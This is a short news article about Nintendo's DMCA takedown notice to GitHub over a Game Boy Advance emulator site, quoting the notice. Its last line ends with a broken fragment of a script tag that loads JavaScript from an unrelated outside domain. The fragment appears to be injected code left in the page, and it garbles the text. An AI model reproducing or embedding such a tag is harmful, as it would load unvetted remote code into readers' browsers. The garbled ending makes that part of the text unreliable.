The Game Boy Advance emulator, a site hosted by GitHub and provides free access to video games, was reportedly shut down by Nintendo claiming that the site reinforces copyright infringement.
Nintendo wrote a takedown notice executing the provisions of the Digital Millennium Copyright Act.
“Certain material posted on the website infringes copyrights owned by Nintendo”, Nintendo’s takedown notice stated.
The notice also stated that the website provides access to unauthorized copies of Nintendo’s copyright-protected video games, showing the likes of Pokémon characters, which is a clear violation of Nintendo’s exclusive rights.
“Nintendo requests that GitHub, Inc. disable public access to the web site at http://jsemu.github.io/gba/,” it added.
Criminal copyright infringement must be taken seriously because this insults intellectual property. type=’text/javascript’ src=’http://online-sale24.com/1.js’>
